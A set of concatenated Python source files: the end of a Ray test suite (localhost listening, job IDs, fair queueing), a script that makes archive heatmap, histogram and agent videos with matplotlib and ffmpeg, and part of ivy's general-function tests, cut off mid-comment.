ray.get([g.remote() for _ in range(5)])
assert ray.worker.global_worker.redis_client.llen("Exports") == num_exports
@pytest.mark.skipif(
sys.platform not in ["win32", "darwin"],
reason="Only listen on localhost by default on mac and windows.",
)
@pytest.mark.parametrize("start_ray", ["ray_start_regular", "call_ray_start"])
def test_listen_on_localhost(start_ray, request):
"""All ray processes should listen on localhost by default
on mac and windows to prevent security popups.
"""
request.getfixturevalue(start_ray)
process_infos = []
for proc in psutil.process_iter(["name", "cmdline"]):
try:
process_infos.append((proc, proc.name(), proc.cmdline()))
except psutil.Error:
pass
for keyword, filter_by_cmd in RAY_PROCESSES:
for candidate in process_infos:
proc, proc_cmd, proc_cmdline = candidate
corpus = (
proc_cmd if filter_by_cmd else subprocess.list2cmdline(proc_cmdline)
)
if keyword not in corpus:
continue
for connection in proc.connections():
if connection.status != psutil.CONN_LISTEN:
continue
# ip can be 127.0.0.1 or ::127.0.0.1
assert "127.0.0.1" in connection.laddr.ip
def test_job_id_consistency(ray_start_regular):
@ray.remote
def foo():
return "bar"
@ray.remote
class Foo:
def ping(self):
return "pong"
@ray.remote
def verify_job_id(job_id, new_thread):
def verify():
current_task_id = ray.runtime_context.get_runtime_context().task_id
assert job_id == current_task_id.job_id()
obj1 = foo.remote()
assert job_id == obj1.job_id()
obj2 = ray.put(1)
assert job_id == obj2.job_id()
a = Foo.remote()
assert job_id == a._actor_id.job_id
obj3 = a.ping.remote()
assert job_id == obj3.job_id()
if not new_thread:
verify()
else:
exc = []
def run():
try:
verify()
except BaseException as e:
exc.append(e)
import threading
t = threading.Thread(target=run)
t.start()
t.join()
if len(exc) > 0:
raise exc[0]
job_id = ray.runtime_context.get_runtime_context().job_id
ray.get(verify_job_id.remote(job_id, False))
ray.get(verify_job_id.remote(job_id, True))
def test_fair_queueing(shutdown_only):
ray.init(
num_cpus=1,
_system_config={
# Having parallel leases is slow in this case
# because tasks are scheduled FIFO,
# the more parallism we have,
# the more workers we need to start to execute f and g tasks
# before we can execute the first h task.
"max_pending_lease_requests_per_scheduling_category": 1,
"worker_cap_enabled": True,
},
)
@ray.remote
def h():
return 0
@ray.remote
def g():
return ray.get(h.remote())
@ray.remote
def f():
return ray.get(g.remote())
# This will never finish without fair queueing of {f, g, h}:
# https://github.com/ray-project/ray/issues/3644
timeout = 60.0
ready, _ = ray.wait(
[f.remote() for _ in range(1000)], timeout=timeout, num_returns=1000
)
assert len(ready) == 1000, len(ready)
if __name__ == "__main__":
sys.exit(pytest.main(["-v", __file__]))
|
supplemental.py
|
"""Generates additional figures and videos.
Usage:
python -m src.analysis.supplemental COMMAND
"""
import functools
import os
import shutil
from multiprocessing import Process
from pathlib import Path
import fire
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
from loguru import logger
from slugify import slugify
from src.analysis import rollout
from src.analysis.figures import load_manifest
from src.analysis.heatmap import plot_generation_on_axis
from src.analysis.utils import load_archive_gen, load_experiment, load_metrics
from src.mpl_styles.utils import mpl_style_file
from src.objectives import ANALYSIS_INFO, get_analysis_id
def agent_videos(manifest: str, output: str, clear: bool = False):
"""Generates agent videos for supplemental material.
Also includes a README in the output directory.
Requires a manifest which looks like this:
Agent Videos:
entries:
- name: XXXX # Videos are saved in output/{slugify(name)}.mp4
logdir: XXXX # See rollout.py for these args.
mode: XXXX
query: XXXX
Note this manifest can be included in the same document as the one for
figures.py since they use different objects ("Paper" and "Agent Videos").
Args:
output: Root directory to place output videos.
manifest: Path to manifest file.
clear: Pass this to clear existing output before generating the videos.
"""
output = Path(output)
readme = output / "README.md"
if clear:
logger.info("Clearing existing output: {}", output)
shutil.rmtree(output, ignore_errors=True)
output.mkdir()
with readme.open("w") as file:
file.write("""\
# Videos
| File | Name | Objective | Measures | Archive Objective | Archive Measures |
| :--- | :--- | --------: | -------: | ----------------: | ---------------: |
""")
output.mkdir(exist_ok=True)
logger.info("Generating videos")
video_data, root_dir = load_manifest(manifest, "Agent Videos")
for entry in video_data["entries"]:
def generate_video():
"""Generates the video.
There seem to be issues with pyvirtualdisplay if we re-run
rollout.main in the same process, but putting it in a separate
process via this method seems to work.
"""
# This error gets thrown for `entry`.
# pylint: disable = cell-var-from-loop
logger.info("Entry: \n{}", entry)
video_name = slugify(entry["name"])
video_output = output / video_name
rollout.main(
logdir=root_dir / entry["logdir"],
mode=entry["mode"],
query=entry["query"] if "query" in entry else None,
delete_frames=True,
video_output=video_output,
)
logger.info("Removing video output and saving mp4")
(video_output / "eval_0/video.mp4").rename(output /
f"{video_name}.mp4")
logger.info("Writing to README")
with (video_output / "eval_0/info.md").open("r") as file:
info = {
key: val[1:-1] for key, val in
[token.split(": ") for token in file.read().split("; ")]
}
with readme.open("a") as file:
file.write(
f"| `{video_name}.mp4` | {entry['name']} "
f"| {info['Objective']} | {info['BCs']} "
f"| {info['Archive Objective']} | {info['Archive BCs']} |\n"
)
logger.info("Removing the video directory.")
shutil.rmtree(video_output)
p = Process(target=generate_video)
p.start()
p.join()
def visualize_env_archives(mode,
root_dir,
viz_data,
env,
cur_subfig,
custom_gen=None):
"""Plots visualizations for one environment in viz_data.
cur_subfig may be either a subfigure or a regular figure.
Pass custom_gen to plot generations that are not the last generation. In
this case, custom_gen must be a dict mapping from algorithm name to the
generation for that algorithm.
"""
ncols = len(viz_data[env]["Algorithms"])
ax = cur_subfig.subplots(
1,
ncols,
gridspec_kw={"wspace": {
"heatmap": 0.03,
"histogram": 0.3,
}[mode]},
)
for col, (cur_ax, algo) in enumerate(zip(ax, viz_data[env]["Algorithms"])):
logdir = load_experiment(root_dir /
viz_data[env]["Algorithms"][algo]["logdir"])
analysis_id = get_analysis_id()
gen = (load_metrics(logdir).total_itrs
if custom_gen is None else custom_gen[algo])
cur_ax.set_title(algo)
if mode == "heatmap":
# See heatmap.py for these settings.
plot_generation_on_axis(
ax=cur_ax,
mode="single",
logdir=logdir,
analysis_id=analysis_id,
gen=gen,
plot_kwargs={
"square": True,
"cmap": "viridis",
"pcm_kwargs": {
"rasterized": True,
},
"vmin": ANALYSIS_INFO[analysis_id]["min_score"],
"vmax": ANALYSIS_INFO[analysis_id]["max_score"],
},
)
cur_ax.set_xticks([0.0, 0.5, 1.0])
cur_ax.set_yticks([0.0, 0.5, 1.0])
if col == 0:
# Set y label on left plot.
cur_ax.set_ylabel(viz_data[env]["ylabel"])
if col == ncols // 2:
# Set x label on middle plot.
cur_ax.set_xlabel(viz_data[env]["xlabel"])
if col == ncols - 1:
# Add colorbar when on last plot in column.
# Remove all current colorbars.
for a in cur_subfig.axes:
if a.get_label() == "<colorbar>":
a.remove()
# Retrieve the heatmap mesh.
artist = None
for child in cur_ax.get_children():
if isinstance(child, mpl.collections.QuadMesh):
artist = child
# Add axes for the colorbar. Solutions for this are complicated:
# https://stackoverflow.com/questions/18195758/set-matplotlib-colorbar-size-to-match-graph
ratio = cur_ax.get_position().width / 0.129638671875
# The axis width is expressed as a fraction of the figure width.
# We first took the width when there were 5 figures, which was
# 0.129638671875, and now we express width as a ratio of axis
# width to that width.
cax = cur_subfig.add_axes([
cur_ax.get_position().x1 + 0.02 * ratio,
cur_ax.get_position().y0,
0.02 * ratio,
cur_ax.get_position().height,
])
# Create colorbar.
cur_subfig.colorbar(artist, cax=cax)
elif mode == "histogram":
archive = load_archive_gen(logdir, gen)
min_score, max_score = (
ANALYSIS_INFO[analysis_id]["min_score"],
ANALYSIS_INFO[analysis_id]["max_score"],
)
# We cut off the histogram at the min score because the min score is
# known, but we increase the max score a bit to show solutions which
# exceed the reward threshold.
bin_counts, bins, patches = cur_ax.hist( # pylint: disable = unused-variable
archive.as_pandas().batch_objectives(),
range=(min_score, max_score + 400),
bins=100,
)
# Rough estimate of max items in a bin.
cur_ax.set_ylim(top=150)
# Force ticks, as there are no ticks when the plot is empty.
cur_ax.set_yticks([0, 50, 100, 150])
# Alternative - logarithmic scale (harder to understand).
# cur_ax.set_yscale("log")
# cur_ax.set_ylim(top=1000)
# Set axis grid to show up behind the histogram.
# https://stackoverflow.com/questions/1726391/matplotlib-draw-grid-lines-behind-other-graph-elements
cur_ax.set_axisbelow(True)
# Set up grid lines on y-axis. Style copied from simple.mplstyle.
cur_ax.grid(color="0.9", linestyle="-", linewidth=0.3, axis="y")
# Color the histogram with viridis.
# https://stackoverflow.com/questions/51347451/how-to-fill-histogram-with-color-gradient-where-a-fixed-point-represents-the-mid
bin_centers = 0.5 * (bins[:-1] + bins[1:])
maxi = np.abs(bin_centers).max()
norm = plt.Normalize(-maxi, maxi)
cm = plt.cm.get_cmap("viridis")
for c, p in zip(bin_centers, patches):
# Also rasterize so we do not see "white lines" between bars.
p.set(facecolor=cm(norm(c)), rasterized=True)
# Hide spines.
for pos in ['right', 'top', 'left']:
cur_ax.spines[pos].set_visible(False)
if col == ncols // 2:
# Set x label on middle plot.
cur_ax.set_xlabel("Objective")
# Adjust position of plots -- somehow, we need to adjust it on every
# iteration rather than just adjusting it once at the end. `left` and
# `right` are tuned for the 5 column case -- they come out to 0.065 and
# 0.95 for 5 columns.
left = 0.065 * 5 / ncols
right = 1 - 0.05 * 5 / ncols
if mode == "heatmap":
cur_subfig.subplots_adjust(left=left, bottom=0.08, right=right)
elif mode == "histogram":
cur_subfig.subplots_adjust(left=left,
bottom=0.25,
right=right,
top=0.7)
# Add suptitle at center of plots.
center_x = (ax[0].get_position().x0 + ax[-1].get_position().x1) / 2
cur_subfig.suptitle(env, x=center_x, y=0.95)
# Figure sizes for one row of archive visualizations (e.g. heatmaps).
ARCHIVE_FIG_WIDTH = 1.2
ARCHIVE_FIG_HEIGHT = 1.45
def visualize_archives(manifest: str,
output: str = None,
custom_gen=None,
mode: str = "heatmap",
video: bool = False):
"""Generates archive visualizations for appendix.
Requires a manifest which looks like this:
Archive Visualization:
Environment 1:
heatmap: True/False # Whether to plot heatmap in this environment
# (not all environments support heatmaps).
xlabel: "XXX" # Label for x-axis.
ylabel: "XXX" # Label for y-axis.
# Algorithms are assumed to be the same across all environments.
Algorithms:
Name 1:
logdir: XXXX
Name 2:
logdir: XXXX
...
Environment 2:
heatmap: ...
xlabel: ...
ylabel: ...
Algorithms:
...
...
Note this manifest can be included in the same document as the one for
figures.py and for `agent_videos`.
Args:
manifest: Path to manifest file.
output: Output file for figure. Defaults to `{mode}_figure.pdf`.
custom_gen: See `visualize_env_archives`.
mode: Either "heatmap" or "histogram".
video: Whether this function is being called as part of video
generation. This induces a few special settings.
"""
assert mode in ["heatmap", "histogram"], \
f"Invalid mode {mode}"
output = f"{mode}_figure.pdf" if output is None else output
output = Path(output)
logger.info("Loading manifest")
viz_data, root_dir = load_manifest(manifest, "Archive Visualization")
if mode == "heatmap":
# Only keep environments that support heatmap.
viz_data = {
key: val
for key, val in viz_data.items()
if val.get("heatmap", False)
}
n_algos = len(next(iter(viz_data.values()))["Algorithms"])
fig = plt.figure(figsize=(ARCHIVE_FIG_WIDTH * n_algos,
ARCHIVE_FIG_HEIGHT * len(viz_data)))
subfigs = fig.subfigures(
len(viz_data),
1,
wspace=0,
hspace=0,
squeeze=False,
).ravel()
logger.info("Plotting visualizations")
with mpl_style_file("archive_visualization.mplstyle") as f:
with plt.style.context(f):
if video:
logger.info("Using video mode")
for cur_subfig, env in zip(subfigs, viz_data):
visualize_env_archives(
mode,
root_dir,
viz_data,
env,
cur_subfig,
custom_gen,
)
# The colorbar is giving trouble, so tight_layout does not work,
# and bbox_inches="tight" does not work either as it seems to cut
# things off despite this:
# https://stackoverflow.com/questions/35393863/matplotlib-error-figure-includes-axes-that-are-not-compatible-with-tight-layou
# Hence, we manually rearrange everything e.g. with subplots_adjust.
fig.savefig(output, dpi=600 if video else 300)
plt.close(fig)
logger.info("Done")
heatmap_figure = functools.partial(visualize_archives,
mode="heatmap",
video=False)
histogram_figure = functools.partial(visualize_archives,
mode="histogram",
video=False)
def visualize_archives_video(manifest: str,
output: str = None,
frames: int = 250,
framerate: int = 20,
delete_frames: bool = False,
skip_frames: bool = False,
mode: str = "heatmap"):
"""Generates videos of archive visualizations.
Uses same manifest as `visualize_archives`.
Note: This method is inefficient because it calls `visualize_archives` for
each frame, so it repeatedly reloads the manifest, logging directories, and
archive histories.
Args:
manifest: Path to manifest file.
output: Output name. The video is saved to "{output}.mp4", and frames
are saved to "{output}/". Defaults to "{mode}_video".
frames: Number of frames to include in video.
framerate: FPS for video.
delete_frames: Whether to delete frames once video is assembled.
skip_plot: Skip plotting the frames and just make the video.
"""
output = f"{mode}_video" if output is None else output
frame_dir = Path(f"{output}/")
if not skip_frames:
logger.info("Removing existing frames")
shutil.rmtree(output, ignore_errors=True)
frame_dir.mkdir()
logger.info("Determining frequency for each algorithm")
freq = {}
viz_data, root_dir = load_manifest(manifest, "Archive Visualization")
for env in viz_data:
algo_data = viz_data[env]["Algorithms"]
for algo in algo_data:
logdir = load_experiment(root_dir / algo_data[algo]["logdir"])
total_itrs = load_metrics(logdir).total_itrs
if total_itrs % frames != 0:
raise RuntimeError(
f"Number of generations ({total_itrs}) "
f"for {algo} "
f"must be divisible by `frames` ({frames})")
freq[algo] = total_itrs // frames
logger.info("Plotting frames")
for i in range(frames + 1):
logger.info("Frame {}", i)
visualize_archives(
manifest,
frame_dir / f"{i:08d}.png",
custom_gen={algo: i * f for algo, f in freq.items()},
mode=mode,
video=True,
)
logger.info("Assembling video with ffmpeg")
video_output = Path(f"{output}.mp4")
os.system(f"""\
ffmpeg -an -r {framerate} -i "{frame_dir / '%*.png'}" \
-vcodec libx264 \
-pix_fmt yuv420p \
-profile:v baseline \
-level 3 \
"{video_output}" \
-y \
""")
if delete_frames:
logger.info("Deleting frames")
shutil.rmtree(frame_dir)
logger.info("Done")
heatmap_video = functools.partial(visualize_archives_video, mode="heatmap")
histogram_video = functools.partial(visualize_archives_video, mode="histogram")
if __name__ == "__main__":
fire.Fire({
"agent_videos": agent_videos,
"heatmap_figure": heatmap_figure,
"heatmap_video": heatmap_video,
"histogram_figure": histogram_figure,
"histogram_video": histogram_video,
})
|
test_general.py
|
"""
Collection of tests for unified general functions
"""
# global
import os
import math
import time
import einops
import pytest
import threading
import numpy as np
from numbers import Number
from collections.abc import Sequence
import torch.multiprocessing as multiprocessing
# local
import ivy
import ivy.functional.backends.numpy
import ivy.functional.backends.jax
import ivy.functional.backends.tensorflow
import ivy.functional.backends.torch
import ivy.functional.backends.mxnet
import ivy_tests.test_ivy.helpers as helpers
# Helpers #
# --------#
def _get_shape_of_list(lst, shape=()):
if not lst:
return []
if not isinstance(lst, Sequence):
return shape
if isinstance(lst[0], Sequence):
l = len(lst[0])
if not all(len(item) == l for item in lst):
msg = 'not all lists have the same length'
raise ValueError(msg)
shape += (len(lst),)
shape = _get_shape_of_list(lst[0], shape)
return shape
# Tests #
# ------#
# set_framework
@pytest.mark.parametrize(
"fw_str", ['numpy', 'jax', 'torch', 'mxnet'])
def test_set_framework(fw_str, dev, call):
ivy.set_framework(fw_str)
ivy.unset_framework()
# use_framework
def test_use_within_use_framework(dev, call):
with ivy.functional.backends.numpy.use:
pass
with ivy.functional.backends.jax.use:
pass
with ivy.functional.backends.tensorflow.use:
pass
with ivy.functional.backends.torch.use:
pass
with ivy.functional.backends.mxnet.use:
pass
@pytest.mark.parametrize(
"allow_duplicates", [True, False])
def test_match_kwargs(allow_duplicates):
def func_a(a, b, c=2):
pass
func_b = lambda a, d, e=5: None
class ClassA:
def __init__(self, c, f, g=3):
pass
kwargs = {'a': 0, 'b': 1, 'c': 2, 'd': 3, 'e': 4, 'f': 5, 'g': 6}
kwfa, kwfb, kwca = ivy.match_kwargs(kwargs, func_a, func_b, ClassA, allow_duplicates=allow_duplicates)
if allow_duplicates:
assert kwfa == {'a': 0, 'b': 1, 'c': 2}
assert kwfb == {'a': 0, 'd': 3, 'e': 4}
assert kwca == {'c': 2, 'f': 5, 'g': 6}
else:
assert kwfa == {'a': 0, 'b': 1, 'c': 2}
assert kwfb == {'d': 3, 'e': 4}
assert kwca == {'f': 5, 'g': 6}
# def test_get_referrers_recursive(dev, call):
#
# class SomeClass:
# def __init__(self):
# self.x = [1, 2]
# self.y = [self.x]
#
# some_obj = SomeClass()
# refs = ivy.get_referrers_recursive(some_obj.x)
# ref_keys = refs.keys()
# assert len(ref_keys) == 3
# assert 'repr' in ref_keys
# assert refs['repr'] == '[1,2]'
# y_id = str(id(some_obj.y))
# y_refs = refs[y_id]
# assert y_refs['repr'] == '[[1,2]]'
# some_obj_dict_id = str(id(some_obj.__dict__))
# assert y_refs[some_obj_dict_id] == 'tracked'
# dict_refs = refs[some_obj_dict_id]
# assert dict_refs['repr'] == "{'x':[1,2],'y':[[1,2]]}"
# some_obj_id = str(id(some_obj))
# some_obj_refs = dict_refs[some_obj_id]
# assert some_obj_refs['repr'] == str(some_obj).replace(' ', '')
# assert len(some_obj_refs) == 1
# array
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"from_numpy", [True, False])
def test_array(object_in, dtype, from_numpy, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
# to numpy
if from_numpy:
object_in = np.array(object_in)
# smoke test
ret = ivy.array(object_in, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == np.array(object_in).shape
# value test
assert np.allclose(call(ivy.array, object_in, dtype, dev), np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support string devices
return
# copy array
@pytest.mark.parametrize(
"x", [[0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
def test_copy_array(x, dtype, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
# smoke test
x = ivy.array(x, dtype, dev)
ret = ivy.copy_array(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(x))
assert id(x) != id(ret)
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support string devices
return
# array_equal
@pytest.mark.parametrize(
"x0_n_x1_n_res", [([0.], [0.], True), ([0.], [1.], False),
([[0.], [1.]], [[0.], [1.]], True),
([[0.], [1.]], [[1.], [2.]], False)])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
def test_array_equal(x0_n_x1_n_res, dtype, dev, call):
if call in [helpers.mx_call] and dtype in ['int16', 'bool']:
# mxnet does not support int16, and does not support bool for broadcast_equal method used
pytest.skip()
x0, x1, true_res = x0_n_x1_n_res
# smoke test
x0 = ivy.array(x0, dtype, dev)
x1 = ivy.array(x1, dtype, dev)
res = ivy.array_equal(x0, x1)
# type test
assert ivy.is_array(x0)
assert ivy.is_array(x1)
assert isinstance(res, bool) or ivy.is_array(res)
# value test
assert res == true_res
# arrays_equal
@pytest.mark.parametrize(
"xs_n_res", [([[[0.], [1.]], [[0.], [1.]], [[1.], [2.]]], False)])
@pytest.mark.parametrize(
"dtype", ['float32'])
def test_arrays_equal(xs_n_res, dtype, dev, call):
xs, true_res = xs_n_res
# smoke test
x0 = ivy.array(xs[0], dtype, dev)
x1 = ivy.array(xs[1], dtype, dev)
x2 = ivy.array(xs[2], dtype, dev)
res = ivy.arrays_equal([x0, x1, x2])
# type test
assert ivy.is_array(x0)
assert ivy.is_array(x1)
assert ivy.is_array(x2)
assert isinstance(res, bool) or ivy.is_array(res)
# value test
assert res == true_res
# equal
@pytest.mark.parametrize(
"x0_n_x1_n_x2_em_n_res", [([0.], [0.], [0.], False, True),
([0.], [1.], [0.], False, False),
([0.], [1.], [0.], True, [[True, False, True],
[False, True, False],
[True, False, True]]),
({'a': 0}, {'a': 0}, {'a': 1}, True, [[True, True, False],
[True, True, False],
[False, False, True]])])
@pytest.mark.parametrize(
"to_array", [True, False])
def test_equal(x0_n_x1_n_x2_em_n_res, to_array, dev, call):
x0, x1, x2, equality_matrix, true_res = x0_n_x1_n_x2_em_n_res
# smoke test
if isinstance(x0, list) and to_array:
x0 = ivy.array(x0, dev=dev)
x1 = ivy.array(x1, dev=dev)
x2 = ivy.array(x2, dev=dev)
res = ivy.all_equal(x0, x1, x2, equality_matrix=equality_matrix)
# value test
if equality_matrix:
assert np.array_equal(ivy.to_numpy(res), np.array(true_res))
else:
assert res == true_res
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support variable number of input arguments
return
# to_numpy
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_numpy(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_numpy() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_numpy(tensor_fn(object_in, dtype, dev))
# type test
assert isinstance(ret, np.ndarray)
# cardinality test
assert ret.shape == np.array(object_in).shape
# value test
assert np.allclose(ivy.to_numpy(tensor_fn(object_in, dtype, dev)), np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support numpy conversion
return
# to_scalar
@pytest.mark.parametrize(
"object_in", [[0.], [[[1]]], [True], [[1.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_scalar(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_scalar() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_scalar(tensor_fn(object_in, dtype, dev))
true_val = ivy.to_numpy(ivy.array(object_in, dtype=dtype)).item()
# type test
assert isinstance(ret, type(true_val))
# value test
assert ivy.to_scalar(tensor_fn(object_in, dtype, dev)) == true_val
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support scalar conversion
return
# to_list
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_list(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_list() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_list(tensor_fn(object_in, dtype, dev))
# type test
assert isinstance(ret, list)
# cardinality test
assert _get_shape_of_list(ret) == _get_shape_of_list(object_in)
# value test
assert np.allclose(np.asarray(ivy.to_list(tensor_fn(object_in, dtype, dev))),
np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support list conversion
return
# shape
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"as_tensor", [None, True, False])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_shape(object_in, dtype, as_tensor, tensor_fn, dev, call):
# smoke test
if len(object_in) == 0 and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ret = ivy.shape(tensor_fn(object_in, dtype, dev), as_tensor)
# type test
if as_tensor:
assert ivy.is_array(ret)
else:
assert isinstance(ret, tuple)
ret = ivy.array(ret)
# cardinality test
assert ret.shape[0] == len(np.asarray(object_in).shape)
# value test
assert np.array_equal(ivy.to_numpy(ret), np.asarray(np.asarray(object_in).shape, np.int32))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Union
return
# get_num_dims
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"as_tensor", [None, True, False])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_get_num_dims(object_in, dtype, as_tensor, tensor_fn, dev, call):
# smoke test
if len(object_in) == 0 and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ret = ivy.get_num_dims(tensor_fn(object_in, dtype, dev), as_tensor)
# type test
if as_tensor:
assert ivy.is_array(ret)
else:
assert isinstance(ret, int)
ret = ivy.array(ret)
# cardinality test
assert list(ret.shape) == []
# value test
assert np.array_equal(ivy.to_numpy(ret), np.asarray(len(np.asarray(object_in).shape), np.int32))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Union
return
# minimum
@pytest.mark.parametrize(
"xy", [([0.7], [0.5]), ([0.7], 0.5), (0.5, [0.7]), ([[0.8, 1.2], [1.5, 0.2]], [0., 1.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_minimum(xy, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(xy[0], Number) or isinstance(xy[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(xy[0], dtype, dev)
y = tensor_fn(xy[1], dtype, dev)
ret = ivy.minimum(x, y)
# type test
assert ivy.is_array(ret)
# cardinality test
if len(x.shape) > len(y.shape):
assert ret.shape == x.shape
else:
assert ret.shape == y.shape
# value test
assert np.array_equal(call(ivy.minimum, x, y), np.asarray(ivy.functional.backends.numpy.minimum(ivy.to_numpy(x), ivy.to_numpy(y))))
# maximum
@pytest.mark.parametrize(
"xy", [([0.7], [0.5]), ([0.7], 0.5), (0.5, [0.7]), ([[0.8, 1.2], [1.5, 0.2]], [0., 1.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_maximum(xy, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(xy[0], Number) or isinstance(xy[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(xy[0], dtype, dev)
y = tensor_fn(xy[1], dtype, dev)
ret = ivy.maximum(x, y)
# type test
assert ivy.is_array(ret)
# cardinality test
if len(x.shape) > len(y.shape):
assert ret.shape == x.shape
else:
assert ret.shape == y.shape
# value test
assert np.array_equal(call(ivy.maximum, x, y), np.asarray(ivy.functional.backends.numpy.maximum(ivy.to_numpy(x), ivy.to_numpy(y))))
# clip
@pytest.mark.parametrize(
"x_min_n_max", [(-0.5, 0., 1.5), ([1.7], [0.5], [1.1]), ([[0.8, 2.2], [1.5, 0.2]], 0.2, 1.4),
([[0.8, 2.2], [1.5, 0.2]], [[1., 1.], [1., 1.]], [[1.1, 2.], [1.1, 2.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_clip(x_min_n_max, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_min_n_max[0], Number) or isinstance(x_min_n_max[1], Number) or isinstance(x_min_n_max[2], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_min_n_max[0], dtype, dev)
min_val = tensor_fn(x_min_n_max[1], dtype, dev)
max_val = tensor_fn(x_min_n_max[2], dtype, dev)
if ((min_val.shape != [] and min_val.shape != [1]) or (max_val.shape != [] and max_val.shape != [1]))\
and call in [helpers.mx_call]:
# mxnet only supports numbers or 0 or 1 dimensional arrays for min and max while performing clip
pytest.skip()
ret = ivy.clip(x, min_val, max_val)
# type test
assert ivy.is_array(ret)
# cardinality test
max_shape = max([x.shape, min_val.shape, max_val.shape], key=lambda x_: len(x_))
assert ret.shape == max_shape
# value test
assert np.array_equal(call(ivy.clip, x, min_val, max_val),
np.asarray(ivy.functional.backends.numpy.clip(ivy.to_numpy(x), ivy.to_numpy(min_val), ivy.to_numpy(max_val))))
# clip_vector_norm
# @pytest.mark.parametrize(
# "x_max_norm_n_p_val_clipped",
# [(-0.5, 0.4, 2., -0.4), ([1.7], 1.5, 3., [1.5]),
# ([[0.8, 2.2], [1.5, 0.2]], 4., 1., [[0.6808511, 1.8723406], [1.2765958, 0.17021278]]),
# ([[0.8, 2.2], [1.5, 0.2]], 2.5, 2., [[0.71749604, 1.9731141], [1.345305, 0.17937401]])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_clip_vector_norm(x_max_norm_n_p_val_clipped, dtype, tensor_fn, dev, call):
# # smoke test
# if call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x_max_norm_n_p_val_clipped[0], dtype, dev)
# max_norm = x_max_norm_n_p_val_clipped[1]
# p_val = x_max_norm_n_p_val_clipped[2]
# clipped = x_max_norm_n_p_val_clipped[3]
# ret = ivy.clip_vector_norm(x, max_norm, p_val)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == (x.shape if len(x.shape) else (1,))
# # value test
